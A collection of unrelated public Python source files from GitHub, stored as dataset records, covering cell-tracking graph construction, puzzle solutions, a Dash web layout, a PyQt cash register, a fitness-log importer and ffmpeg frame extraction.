boundaryCostMultiplierFunc,\n divisionProbabilityFunc):\n '''\n Build a json representation of this hypotheses graph, by transforming the probabilities for certain\n events (given by the `*ProbabilityFunc`-functions per traxel) into energies. 
If the given graph\n contained tracklets (`withTracklets`), then also the probabilities over all contained traxels will be\n accumulated for those nodes in the graph.\n\n The `hypothesesGraph` as well as `nodeIterator` and `arcIterator` are needed as parameters to\n support the legacy pgmlink-style hypotheses graph as well.\n\n ** Parameters: **\n\n * `hypothesesGraph`: graph whose nodes and edges we are about to traverse.\n * `nodeIterator`: node iterator\n * `arcIterator`: arc iterator\n * `withTracklets`: whether tracklets are used\n * `maxNumObjects`: the max number of objects per detection\n * `numElements`: number of nodes + number of edges (for progress bar)\n * `traxelMap`: mapping from graph-node to list of traxels (in a tracklet)\n * `detectionProbabilityFunc`: should take a traxel and return its detection probabilities\n ([prob0objects, prob1object,...])\n * `transitionProbabilityFunc`: should take two traxels and return this link's probabilities\n ([prob0objectsInTransition, prob1objectsInTransition,...])\n * `boundaryCostMultiplierFunc`: should take a traxel and a boolean that is true if we are seeking an appearance cost multiplier, \n false for disappearance, and return a scalar multiplier between 0 and 1 for the\n appearance/disappearance cost that depends on the traxel's distance to the spatial and time boundary\n * `divisionProbabilityFunc`: should take a traxel and return its division probabilities\n ([probNoDiv, probDiv])\n '''\n\n getLogger().info(\"Creating JSON graph from legacy hypotheses graph\")\n progressBar = ProgressBar(stop=numElements)\n trackingGraph = hytra.core.jsongraph.JsonTrackingGraph()\n\n # add all detections to JSON\n for n in nodeIterator:\n if not withTracklets:\n # only one traxel, but make it a list so everything below works the same\n traxels = [traxelMap[n]]\n else:\n traxels = traxelMap[n]\n\n # accumulate features over all contained traxels\n previousTraxel = None\n detectionFeatures = np.zeros(maxNumObjects + 1)\n for t in traxels:\n detectionFeatures += np.array(negLog(detectionProbabilityFunc(t)))\n if previousTraxel is not None:\n detectionFeatures += np.array(negLog(transitionProbabilityFunc(previousTraxel, t)))\n previousTraxel = t\n\n detectionFeatures = listify(list(detectionFeatures))\n\n # division only if probability is big enough\n divisionFeatures = divisionProbabilityFunc(traxels[-1])\n if divisionFeatures is not None:\n divisionFeatures = listify(negLog(divisionFeatures))\n\n # appearance/disappearance\n appearanceFeatures = listify([0.0] + [boundaryCostMultiplierFunc(traxels[0], True)] * maxNumObjects)\n disappearanceFeatures = listify([0.0] + [boundaryCostMultiplierFunc(traxels[-1], False)] * maxNumObjects)\n\n trackingGraph.addDetectionHypothesesFromTracklet(traxels,\n detectionFeatures,\n divisionFeatures,\n appearanceFeatures,\n disappearanceFeatures,\n timestep=[traxels[0].Timestep, traxels[-1].Timestep])\n progressBar.show()\n\n # add all links\n for a in arcIterator:\n if not withTracklets:\n srcTraxel = traxelMap[hypothesesGraph.source(a)]\n destTraxel = traxelMap[hypothesesGraph.target(a)]\n else:\n srcTraxel = traxelMap[hypothesesGraph.source(a)][-1] # src is last of the traxels in source tracklet\n destTraxel = traxelMap[hypothesesGraph.target(a)][0] # dest is first of traxels in destination tracklet\n src = trackingGraph.traxelIdPerTimestepToUniqueIdMap[str(srcTraxel.Timestep)][str(srcTraxel.Id)]\n dest = trackingGraph.traxelIdPerTimestepToUniqueIdMap[str(destTraxel.Timestep)][str(destTraxel.Id)]\n\n features 
= listify(negLog(transitionProbabilityFunc(srcTraxel, destTraxel)))\n trackingGraph.addLinkingHypotheses(src, dest, features)\n progressBar.show()\n\n return trackingGraph","repo_name":"chaubold/hytra","sub_path":"hytra/core/ilastikhypothesesgraph.py","file_name":"ilastikhypothesesgraph.py","file_ext":"py","file_size_in_byte":14842,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"74504265155","text":"# Part 1\nfile = open(\"input.txt\")\nl = file.readlines()\n\ntotal = 0\nfor line in l:\n total += int(line)\n\nprint(\"Part 1: \" + str(total))\n\n# Part 2\ncurrFreq = 0\ns = {0}\ni = 0\n\nwhile True:\n if i >= len(l):\n i = 0\n\n currFreq += int(l[i])\n\n if currFreq in s:\n print(\"Part 2: \" + str(currFreq))\n break\n s.add(currFreq)\n\n i += 1","repo_name":"laxel/adventOfCode","sub_path":"2018/Day01/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3385883070","text":"# Title: Module_01 Exercise_08\n# Author: Wendy Dushanin\n# UNCC Student ID: 800727084\n# Date: January 18, 2022\n\n# Description: Take in 10 integers from user. Create a new list with only elements\n# which appear once. Print the list with the unique elements.\n\n# References: \n# https://thispointer.com/python-3-ways-to-check-if-there-are-duplicates-in-a-list/\n# https://www.geeksforgeeks.org/python-ways-to-remove-duplicates-from-list/\n# https://www.geeksforgeeks.org/counting-the-frequencies-in-a-list-using-dictionary-in-python/\n# https://www.kite.com/python/answers/how-to-count-item-frequency-in-python\n\n# creates list to store inputs\n\nlist_01 = []\nfreq = {}\nlist_02 = []\n\n#Asks users for the elements of list_01\nfor i in range(0, 10):\n # Asks user for individual list_01 inputs\n num = int(input('Enter number for list_01: '))\n # Adds inputs to the list_01\n list_01.append(num)\n\n# Count how many times each entered value occurs\nfor elem in list_01:\n if elem in freq:\n freq[elem] += 1\n else:\n freq[elem] = 1\n\n# Keep only the values that appear exactly once\nfor elem, count in freq.items():\n if count == 1:\n list_02.append(elem)\n\nprint(list_02)\n","repo_name":"wDushanin/ITSC-3155-Intro-to-Python-Exercises","sub_path":"exercise_08.py","file_name":"exercise_08.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43444074493","text":"import os\nfrom functools import partial\n\nimport dash_bootstrap_components as dbc\nimport polars as pl\nfrom dash import dcc, html\n\nfrom .filter_rows import get_filter_rows\n\nintro = open(\"webapp/layout/intro.md\", \"r\").read()\ndata_path = os.getcwd() + \"/data\"\n\nplayers = pl.read_parquet(data_path + \"/players.parquet\")\n\nmake_tab = partial(\n dcc.Tab, style={\"fontWeight\": \"bold\"}, selected_style={\"fontWeight\": \"bold\"}\n)\n\nattribution = html.Details(\n title=\"Description\",\n open=True,\n style={\"margin-top\": \"1%\", \"margin-left\": \"1.5%\"},\n children=[\n html.Summary(id=\"open_details\", children=\"Close Description\"),\n html.Div(id=\"open_state\", children=True, style={\"display\": \"none\"}),\n dbc.Card(\n id=\"description\",\n children=[\n dbc.CardHeader(\"Data Attribution and Usage\"),\n dbc.CardBody([dcc.Markdown(intro)]),\n ],\n ),\n ],\n)\n\nstore_matches = dcc.Store(id=\"player_matches\")\nstore_info = dcc.Store(id=\"player_info\")\n\ntabs = dbc.Row(\n [\n dcc.Tabs(\n id=\"tabs\",\n value=\"summary\",\n children=[\n make_tab(label=\"Player Summary\", value=\"summary\"),\n 
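# One tab per analysis view; shared styling comes from the make_tab partial above.\n 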
make_tab(label=\"Serve & Return\", value=\"serve_return\"),\n make_tab(label=\"Under Pressure\", value=\"under_pressure\"),\n make_tab(\n label=\"H2H\",\n value=\"h2h\",\n ),\n ],\n colors={\n \"border\": \"white\",\n \"primary\": \"gold\",\n \"background\": \"cornsilk\",\n },\n ),\n ],\n)\n\n\npage = html.Div(\n [\n attribution,\n store_matches,\n store_info,\n get_filter_rows(players),\n tabs,\n dbc.Row(id=\"tab-content\", style={\"margin-left\": \"1.5%\", \"margin-right\": \"1.5%\"}),\n ]\n)\n","repo_name":"FBruzzesi/atp_stats_webapp","sub_path":"webapp/layout/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"1514743217","text":"def remove_vowels(input_string):\n vowels = \"aeiouyAEIOUY\"\n result = \"\"\n for char in input_string:\n if char not in vowels:\n result += char\n return result\n\n\ninput_str = \"My name is Hlib! But you can call me Bread.\"\nresult = remove_vowels(input_str)\nprint(\"Original string:\", input_str)\nprint(\"String with vowels removed:\", result)\n","repo_name":"HKalininQA/hillel_HW","sub_path":"hw6/hw6_7.py","file_name":"hw6_7.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17153561248","text":"import os\nimport numpy as np\n\n# Get number of running and pending jobs\ncmd = \"squeue -u bibeauv -h -t pending,running -r | wc -l\"\nrunning_jobs = int(os.popen(cmd).read())\n\n# Get last mixer being launched\nwith open('last_mixer.txt', 'r') as f:\n last_job = f.readlines()\n\n# Mixers to launch\nmax_jobs = 1000\nfirst_mixer = int(last_job[0])+1\nlast_mixer = (max_jobs - running_jobs) + first_mixer-1\n\nthis_path = os.getcwd() + '/..'\nfor mixer in np.linspace(first_mixer, last_mixer, (last_mixer-first_mixer)+1, dtype=int):\n geo_path = this_path + '/mixer_' + str(mixer)\n os.chdir(geo_path)\n\n os.system('cp ../launch_lethe.py .')\n os.system('cp ../launch_lethe.sh .')\n os.system('sbatch -J ' + 'mixer_' + str(mixer) + ' launch_lethe.sh')\n\nos.chdir('../utils')\n\n# Change first and last mixer being launched\nwith open('last_mixer.txt', 'w') as f:\n f.write(str(last_mixer))\n\nwith open('first_mixer.txt', 'w') as f:\n f.write(str(first_mixer))\n","repo_name":"lethe-cfd/mixing-ann","sub_path":"sim100k/utils/launch_auto_job.py","file_name":"launch_auto_job.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"19812483738","text":"from PyQt5.QtWidgets import QTableWidgetItem, QMessageBox\nfrom GUI.ui_GUI import Ui_Sistema\nfrom PyQt5.QtCore import QDateTime\nfrom DataBase.DataBase import DataBase\n\nfrom Funcoes.genericas import caminho_db, mascara_dinheiro, remover_masc_dinheiro\n\nfrom Funcoes.poupup import Poup, Erro\n\n\nclass Caixa(Ui_Sistema):\n\n def __init__(self, ui, dados): \n #inicia as variaveis basicas\n self.db = DataBase(caminho_db())\n self.gasolina = self.db.valor_combustivel(\"Gasolina Comum\")\n\n self.dados_usuario = dados\n self.ui = ui\n\n #Insere informações na tela\n self.ui.cb_bomba.currentIndexChanged.connect(lambda: self.redefinir_campo_leitura_anterior())\n self.atualizar_tela()\n self.preencher_nome()\n\n #Ação dos botões\n self.ui.btn_cx_inserir.clicked.connect(lambda: self.calculo_caixa())\n self.ui.btn_cx_inserir.setAutoDefault(True)\n self.ui.btn_cx_fechar.clicked.connect(lambda: 
self.inserir_dados())\n self.ui.btn_cx_fechar.setAutoDefault(True)\n\n\n self.ui.ln_cx_din.editingFinished.connect(lambda: self.definir_campo_troco())\n self.ui.ln_cx_pix.editingFinished.connect(lambda: self.definir_campo_troco())\n self.ui.ln_cx_cartao.editingFinished.connect(lambda: self.definir_campo_troco())\n\n def atualizar_tela(self):\n self.limpar_dados()\n self.inserir_informacoes_tela()\n self.inserir_info_cb_bombas()\n\n\n def limpar_dados(self):\n self.dados = {\n 'codigo' : 0,\n 'digital_anterior': '',\n 'analogico_anterior': '',\n 'valor_gasolina' : self.gasolina,\n }\n self.dados_fechamento_caixa = {\n 'data' : '',\n 'bomba' : '',\n 'funcionario' : '',\n 'digital_anterior': '',\n 'analogico_anterior': '',\n 'digital_atual' : '',\n 'analogico_atual' : '',\n 'litros' : '',\n 'valor' : '',\n 'dinheiro_caixa' : '',\n 'pix' : '',\n 'cartao' : '',\n 'total' : '',\n 'resto' : '',\n 'retiradas' : {},\n }\n self.dados_retiradas = {}\n\n self.dados_vendas = {}\n\n def inserir_informacoes_tela(self):\n self.ui.cx_nome.setCurrentText(self.dados_usuario['nome'])\n self.ui.cx_data.setDateTime(QDateTime.currentDateTime())\n\n def redefinir_campo_leitura_anterior(self):\n self.consultar_leitura_anterior()\n self.ui.ln_ana_anterior.setText(str(self.dados['analogico_anterior']))\n self.ui.ln_digi_anterior.setText(str(self.dados['digital_anterior']))\n\n def consultar_leitura_anterior(self):\n dados = self.db.select_caixa_anterior(self.ui.cb_bomba.currentText())\n leitura_anterior = dados[0]\n self.dados['codigo'] = dados[1]\n if leitura_anterior[0] > 1000.000:\n anterior = leitura_anterior[0] - 1000\n else: anterior = leitura_anterior[0]\n self.dados['digital_anterior'] = self.converter_string_para_float(\"{:.3f}\".format(anterior)) \n self.dados['analogico_anterior'] = self.converter_string_para_float(leitura_anterior[1]) \n\n def calculo_caixa(self):\n campos_vazios = False\n campos_vazios = self.receber_dados_leitura_fechamento()\n\n if campos_vazios == False:\n self.receber_dados_leitura_anterior()\n\n analogico = (self.dados_fechamento_caixa['analogico_atual'] - self.dados_fechamento_caixa['analogico_anterior']) * 1000\n digital = self.dados_fechamento_caixa['digital_atual'] - self.dados_fechamento_caixa['digital_anterior']\n\n self.dados_fechamento_caixa['litros'] = float(\"{:.2f}\".format((analogico + (digital)) / 2))\n\n self.dados_fechamento_caixa['valor'] = self.converter_string_para_float(\"{:.2f}\".format(self.dados_fechamento_caixa['litros'] * self.dados['valor_gasolina']))\n\n self.inserir_valores_finais()\n else:\n Erro(\"Preencha todos os campos corretamente.\", QMessageBox.Warning)\n\n def calculo_tanque(self, litros):\n DataBase(caminho_db()).querry_generica(\"UPDATE Valor_combustivel SET quantidade = quantidade - {} WHERE combustivel = 'Gasolina Comum'\".format(litros))\n\n def inserir_valores_finais(self):\n self.ui.ln_cx_litros.setText(f\"{self.dados_fechamento_caixa['litros']}\")\n self.ui.ln_cx_valor.setText(f\"{self.dados_fechamento_caixa['valor']}\")\n \n campos = [self.ui.ln_cx_din, self.ui.ln_cx_pix, self.ui.ln_cx_cartao]\n for campo in campos:\n campo.setText(\"0.0\")\n\n def receber_dados_leitura_fechamento(self):\n try:\n self.dados_fechamento_caixa['analogico_atual'] = self.converter_string_para_float(self.ui.ln_ana_atual.text())\n self.dados_fechamento_caixa['digital_atual'] = self.converter_string_para_float(self.ui.ln_digi_atual.text())\n return False\n except ValueError:\n return True\n\n def receber_dados_leitura_anterior(self):\n 
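# Copy the previously read pump counters into the cash-closing record.\n 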
self.dados_fechamento_caixa['analogico_anterior'] = self.dados['analogico_anterior']\n self.dados_fechamento_caixa['digital_anterior'] = self.dados['digital_anterior']\n\n def definir_campo_troco(self):\n try: \n self.dados_fechamento_caixa['dinheiro_caixa'] = self.converter_string_para_float(self.ui.ln_cx_din.text())\n self.dados_fechamento_caixa['pix'] = self.converter_string_para_float(self.ui.ln_cx_pix.text())\n self.dados_fechamento_caixa['cartao'] = self.converter_string_para_float(self.ui.ln_cx_cartao.text())\n \n try:\n self.dados_fechamento_caixa['total'] = self.dados_fechamento_caixa['dinheiro_caixa'] + self.dados_fechamento_caixa['pix'] + self.dados_fechamento_caixa['cartao']\n self.dados_fechamento_caixa['resto'] = self.dados_fechamento_caixa['total'] - self.dados_fechamento_caixa['valor']\n self.ui.ln_cx_resto_2.setText((f\"{self.dados_fechamento_caixa['total']:.2f}\"))\n self.ui.ln_cx_resto.setText((f\"{self.dados_fechamento_caixa['resto']:.2f}\"))\n except (ValueError, TypeError):\n Erro(\"Valor inválido.\", QMessageBox.Warning)\n self.ui.ln_cx_din.setText(\"0\")\n self.ui.ln_cx_pix.setText(\"0\")\n self.ui.ln_cx_cartao.setText(\"0\")\n self.ui.ln_cx_resto_2.setText(\"0\")\n\n except ValueError:\n Erro(\"Preencha os campos corretamente.\", QMessageBox.Warning, \"Erro\")\n\n def converter_string_para_float(self, num):\n try:\n n = num\n n = n.replace(\",\", \".\")\n return float(n)\n except AttributeError:\n return float(n)\n\n def preencher_nome(self):\n nomes = self.db.querry_generica('SELECT DISTINCT funcionario FROM Caixa')\n for nome in nomes:\n self.ui.cx_nome.addItem(nome[0])\n\n def calcular_total_retiradas(self):\n total = 0\n if self.dados_retiradas:\n for dado in self.dados_retiradas.values():\n total += remover_masc_dinheiro(dado['valor'])\n return total\n\n def inserir_dados(self):\n if self.dados_retiradas != {}:\n self.dados_fechamento_caixa['retiradas'] = {\n 'codigo' : self.dados['codigo'],\n 'total' : self.calcular_total_retiradas(),\n 'retiradas' : self.dados_retiradas\n }\n else:\n self.dados_fechamento_caixa['retiradas'] = {'total' : 0}\n\n self.dados_fechamento_caixa['data'] = self.ui.cx_data.date().toString('yyyy-MM-dd')\n self.dados_fechamento_caixa['bomba'] = self.ui.cb_bomba.currentText()\n self.dados_fechamento_caixa['funcionario'] = self.ui.cx_nome.currentText()\n\n vazio = self.verifica_campos_vazios(self.dados_fechamento_caixa)\n\n if not vazio:\n campos_vazios = Poup.confirma(\"Deseja completar o fechamento de caixa?\", QMessageBox.Warning)\n\n if campos_vazios:\n self.db.inserir_caixa(self.dados_fechamento_caixa)\n self.inserir_conta()\n self.calculo_tanque(self.dados_fechamento_caixa['litros'])\n #self.db.close_db()\n self.limpar_campos_caixa()\n self.ui.stackedWidget_2.setCurrentIndex(0)\n \n else:\n Erro(\"Preencha todos os campos corretamente.\", QMessageBox.Warning)\n\n def inserir_conta(self):\n self.db.querry_generica(\"UPDATE Contas SET valor = valor + {} WHERE conta = 'Caixa Posto'\".format(self.dados_fechamento_caixa[\"dinheiro_caixa\"]))\n if self.dados_fechamento_caixa[\"pix\"] != 0 or self.dados_fechamento_caixa[\"cartao\"] != 0:\n self.db.querry_generica(\"UPDATE Contas SET valor = valor + {} WHERE conta = 'Conta Inter'\".format(self.dados_fechamento_caixa[\"pix\"] + self.dados_fechamento_caixa[\"cartao\"]))\n\n def limpar_campos_caixa(self):\n self.ui.ln_digi_anterior.setText(\"\")\n self.ui.ln_digi_atual.setText(\"\")\n self.ui.ln_ana_anterior.setText(\"\")\n 
self.ui.ln_ana_atual.setText(\"\")\n self.ui.ln_cx_litros.setText(\"\")\n self.ui.ln_cx_valor.setText(\"\")\n self.ui.ln_cx_din.setText(\"\")\n self.ui.ln_cx_pix.setText(\"\")\n self.ui.ln_cx_cartao.setText(\"\")\n self.ui.ln_cx_resto_2.setText(\"\")\n self.ui.ln_cx_resto.setText(\"\")\n\n def verifica_campos_vazios(self, dados):\n for i in dados.values():\n if i == '':\n return True \n return False\n\n def inserir_info_cb_bombas(self):\n dados = self.db.consulta_bombas()\n self.ui.cb_bomba.clear()\n #self.ui.cb_bomba.addItem(\"\")\n for i in dados:\n self.ui.cb_bomba.addItem(str(i[0]))\n\n \nclass Vendas(Caixa):\n pass","repo_name":"GsFerreira99/Sistema-Posto","sub_path":"Funcoes/caixa.py","file_name":"caixa.py","file_ext":"py","file_size_in_byte":9870,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23447058471","text":"# ?\r\n\r\n#file_in = \"B-sample.in\"\r\n#file_out = \"B-sample.out\"\r\nfile_in = \"B-small-attempt1.in\"\r\nfile_out = \"B-small-attempt1.out\"\r\n#file_in = \"B-large.in\"\r\n#file_out = \"B-large.out\"\r\n\r\n#import math\r\n\r\n# Solves the problem\r\ndef Solve(N, A):\r\n SA = sorted(A)\r\n \r\n f = []\r\n b = []\r\n\r\n count = 0\r\n for a in SA:\r\n i = A.index(a)\r\n cf = 0\r\n cb = 0\r\n if 0 == i or N - 1 == i:\r\n continue\r\n for j in range(0, i):\r\n if A[j] > a:\r\n cf = cf + 1\r\n for j in range(i + 1, N):\r\n if A[j] > a:\r\n cb = cb + 1\r\n count = count + min(cf, cb)\r\n return count\r\n\r\n\r\n\r\n# Reads the input data and runs the test cases\r\ndef Run():\r\n fin = open(file_in, 'r')\r\n fout = open(file_out, 'w')\r\n\r\n lines = []\r\n for l in fin:\r\n lines.append(l)\r\n\r\n i = 0\r\n T = int(lines[0])\r\n i = i + 1\r\n \r\n for tc in range(0, T):\r\n N = int(lines[i].rstrip())\r\n i = i + 1\r\n As = lines[i].rstrip().split(' ')\r\n i = i + 1\r\n A = []\r\n for j in xrange(0, N):\r\n A.append(int(As[j]))\r\n result = str(Solve(N, A))\r\n fout.write(\"Case #\" + str(tc + 1) + \": \" + result + '\\n')\r\n fin.close()\r\n fout.close()\r\n \r\n\r\ndef main():\r\n Run()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_149/115.py","file_name":"115.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14580250754","text":"#!/usr/bin/env python\nfrom notes import google_sheets\nimport json\nfrom pprint import pprint\nfrom datetime import datetime\n\ndef convert_to_date(timestamp):\n return str(datetime.utcfromtimestamp(int(timestamp)/1000).strftime('%m/%d/%Y'))\n\n\ndef convert_to_lbs(kgs):\n # rounds results to .5 lb granularity (matches plate sizes)\n return round((kgs*2.20462)*2)/2\n\n\ndef filter_exercise(exercise):\n return 'V-Bar' not in exercise and \\\n 'Chinup' not in exercise and \\\n 'Dumbbell' not in exercise and \\\n 'Incline' not in exercise and \\\n 'Curl' not in exercise and \\\n 'Pushup' not in exercise and \\\n 'Pulldown' not in exercise\n\n\nprograms = {}\n\nwith open('E:\\\\Dropbox\\\\projects\\\\fitness\\\\progression_backup\\\\up.json', 'r') as prgms:\n program_data = json.load(prgms)\n for program in program_data:\n programs[program['id']] = {'name': program['name'], 'activities': {}}\n for day in program['days']:\n for activity in day['activities']:\n programs[program['id']]['activities'][activity['id']] = activity['name']\n\nexercises_to_append = []\n\nwith 
open('E:\\\\Dropbox\\\\projects\\\\fitness\\\\progression_backup\\\\fws.json', 'r') as logs:\n logs_data = json.load(logs)\n for entry in logs_data:\n date = convert_to_date(entry['startTime'])\n try:\n program = programs[entry['programId']]['name']\n except KeyError:\n program = 'None'\n for activity in entry['activities']:\n exercise = activity['name']\\\n .replace('Barbell ', '')\\\n .replace('Shoulder', 'Overhead')\\\n .replace('Chinup', 'Chinup Negative')\\\n .replace('Machine ', '')\\\n .replace('Bent-Over', 'Barbell')\n sets = []\n for _set in activity['performance']['completedSets']:\n sets.append((_set['reps'], convert_to_lbs(_set['weight'])))\n if filter_exercise(exercise) and program != 'None':\n # print(f\"{date} | {program} | {exercise} | {max(sets)}\")\n exercises_to_append.append([date, exercise, max(sets)[1], max(sets)[0]])\n\n# grab a list of known workouts in a google sheet\nsheets_connection = google_sheets.Sheets()\nfor entry in exercises_to_append:\n print(entry)\n sheets_connection.append_list_to_table(\n '1-vRxFamZOI_doMbcfVIpoEGaeDFvVM6OBWg0QM9YbBw',\n 'Connor-Historical',\n 'A2:D',\n entry)\n","repo_name":"chisaipete/flow","sub_path":"process_progression.py","file_name":"process_progression.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4496965992","text":"import os\nimport tempfile\nfrom subprocess import check_output\nimport matplotlib\nimport shutil\nimport copy\nimport multiprocessing\nimport math\nimport skimage.draw\n\nmatplotlib.use('Agg') # needs to be executed before the pyplot import; deactivates showing of plots in ipython\nimport matplotlib.pyplot as plt\nimport matplotlib.patheffects\nimport matplotlib.colors\n\nimport numpy as np\nfrom PIL import Image\n\nfrom . import config\nfrom . import utils\nfrom . 
import api\n\nframe_path_cacher = utils.FileSystemCache(max_cache_size=2048, cache_dir=config.cache_directory)\n\ndef adjust_cropping_window(xs, ys, scale, keepaspect=True, padding=600):\n xs, ys = (xs * scale).astype(np.int), (ys * scale).astype(np.int)\n padding *= scale\n\n width, height = int(config.width * scale), int(config.height * scale)\n\n left, top, right, bottom = xs.min()-padding, ys.min()-padding,\\\n xs.max()+padding, ys.max()+padding\n \n if keepaspect:\n aspect = width / height\n w, h = right - left, bottom - top\n diff = w - h * aspect\n if diff == 0:\n pass\n if diff < 0:\n left, right = left - abs(diff)//2, right + abs(diff)//2\n if min(width - right, left) < 0:\n diff = abs(left) if left < 0 else width - right\n left, right = left + diff, right + diff\n elif diff > 0:\n diff = abs(diff) / aspect\n top, bottom = top - diff // 2, bottom + diff // 2\n if min(height - bottom, top) < 0:\n diff = abs(top) if top < 0 else height - bottom\n top, bottom = top + diff, bottom + diff\n\n left, top, right, bottom = [x + x % 2 for x in (left, top, right, bottom)] # make numbers even for ffmpeg\n left, top, right, bottom = max(left, 0), max(top, 0), min(right, width), min(bottom, height)\n return left, top, right, bottom\n\n\ndef extract_single_frame(frame, scale, format=\"jpg\"):\n \"\"\"\n Extracts the image belonging to a `Frame`-object.\n Args:\n frame (Frame): The frame which should be extracted.\n\n Returns:\n An utils.ReusableBytesIO object containing the image.\n\n \"\"\"\n cache_key = (frame.frame_id, scale, format)\n if cache_key not in frame_path_cacher:\n try:\n with tempfile.NamedTemporaryFile(suffix=\".\"+format) as tmpfile:\n\n cmd = config.ffmpeg_extract_single_frame.format(\n video_path=frame.fc.video_path,\n frame_index=frame.index,\n output_path=tmpfile.name,\n scale=scale\n )\n print('executing: ', cmd)\n output = check_output(cmd, shell=True)\n print('output:', output)\n\n frame_path_cacher.put(cache_key, tmpfile.name)\n except FileNotFoundError:\n # The temporary file has been moved to the cache and can not be deleted.\n pass\n buf = frame_path_cacher.get_image_buffer(cache_key)\n return buf\n\ndef extract_frames(framecontainer, scale, format=\"jpg\", return_frame_id=None, begin_frame_id=None, number_of_frames=None):\n \"\"\"\n Extracts all frame-images of the corresponding video file of a FrameContainer.\n Optionally, extracts /number_of_frames/ frames starting by the frame with /begin_frame_id/.\n\n Args:\n framecontainer (FrameContainer): The FrameContainer which represents the video file from which the frames\n should be extracted\n return_frame_id: If not None, only the image buffer corresponding to the given frame_id will the returned.\n\n Returns:\n Dictionary with a mapping of Frame.id to utils.ReusableBytesIO object containing the frame.\n\n \"\"\"\n # Required frames.\n # Subset of the resulting filenames of the ffmpeg command.\n frame_set = framecontainer.frame_set\n\n # Check if all frames are already in the cache.\n images, cache_keys = None, None\n if begin_frame_id is None:\n # Fetch all frames belonging to that video.\n cache_keys = [(frame.frame_id, scale, format) for frame in frame_set.all()]\n else:\n # Figure out which index to start at and then get N frames.\n begin_frame_index = None\n for frame in frame_set.all():\n if frame.frame_id == begin_frame_id:\n begin_frame_index = frame.index\n break\n if begin_frame_index is None:\n raise ValueError(\"begin_frame_id is not contained in the frame container.\")\n # And add this subset to expected 
results.\n cache_keys, images = [], []\n for frame in frame_set.all():\n if frame.index < begin_frame_index or frame.index >= begin_frame_index + number_of_frames:\n continue\n cache_keys.append((frame.frame_id, scale, format))\n images.append('{:04}.{}'.format(frame.index - begin_frame_index, format))\n \n cache_miss = False\n for key in cache_keys:\n if key not in frame_path_cacher:\n cache_miss = True\n break\n\n if cache_miss:\n # Extract all frames via ffmpeg.\n if images is None:\n images = ['{:04}.{}'.format(x, format) for x in frame_set.values_list('index', flat=True)]\n\n with tempfile.TemporaryDirectory() as tmpdir:\n\n cmd = None\n if begin_frame_id is None:\n cmd = config.ffmpeg_extract_all_frames.format(\n video_path=framecontainer.video_path, output_path=tmpdir, scale=scale,\n file_format=format)\n else:\n cmd = config.ffmpeg_extract_n_frames.format(\n video_path=framecontainer.video_path, output_path=tmpdir, scale=scale,\n file_format=format, first_frame_index=begin_frame_index, number_of_frames=number_of_frames)\n print('executing: ', cmd)\n output = check_output(cmd, shell=True)\n print('output:', output)\n \n for idx in range(len(cache_keys)):\n frame_path_cacher.put(cache_keys[idx], os.path.join(tmpdir, images[idx]))\n \n results = dict()\n for (frame_id, scale, format) in cache_keys:\n if return_frame_id is None or frame_id == return_frame_id:\n results[frame_id] = frame_path_cacher.get_image_buffer((frame_id, scale, format))\n assert results[frame_id] is not None\n return results\n\n\ndef extract_video(frames):\n \"\"\"\n Extracts a number of frames and makes a video.\n Args:\n frames (list:Frame): list of frames\n\n Returns:\n The video as a utils.ReusableBytesIO object.\n \"\"\"\n with tempfile.TemporaryDirectory() as tmpdir:\n\n for i, frame in enumerate(frames):\n buffer = frame.get_image(extract='all')\n output_path = os.path.join(tmpdir, f'{i:04}.jpg')\n with open(output_path, \"wb\") as file:\n shutil.copyfileobj(buffer, file)\n\n with tempfile.NamedTemporaryFile(suffix=\".mp4\") as tmpfile:\n\n cmd = config.ffmpeg_frames_to_video.format(\n input_path=f'{tmpdir}/%04d.jpg',\n output_path=tmpfile.name,\n framerate=3\n )\n print('executing: ', cmd)\n check_output(cmd, shell=True)\n \n with open(tmpfile.name, \"rb\") as file:\n output = utils.ReusableBytesIO(file.read())\n output.seek(0)\n return output\n\ndef rotate_direction_vec(rotation, scale):\n x, y = 0, 5 / scale\n sined = np.sin(rotation)\n cosined = np.cos(rotation)\n normed_x = x*cosined - y*sined\n normed_y = x*sined + y*cosined\n return np.around(normed_x, decimals=2), np.around(normed_y, decimals=2)\n\n\nclass FramePlotter(api.FramePlotter):\n\n # Internal attributes.\n _xs_scaled = None\n _ys_scaled = None\n _cam_id = None\n _timestamp = None\n\n def __init__(self, **args):\n super(FramePlotter, self).__init__(**args)\n\n if self._colors is not None:\n if type(self._colors) is list:\n self._colors = np.array(self._colors)\n if self._colors.ndim == 1:\n self._colors = self._colors.reshape(-1, 1)\n if self._labels is not None:\n self._labels = np.array(self._labels)\n\n # Wrap the internal properties in case they require post-processing.\n\n @property\n def xs(self):\n if not self._xs:\n return None\n if self._xs_scaled is None:\n self._xs_scaled = (np.array(self._xs) * self.scale).astype(np.int)\n return self._xs_scaled\n @property\n def ys(self):\n if not self._ys:\n return None\n if self._ys_scaled is None:\n self._ys_scaled = (np.array(self._ys) * self.scale).astype(np.int)\n return self._ys_scaled\n 
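# The unscaled accessors below return the raw coordinates exactly as supplied by the caller.\n 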
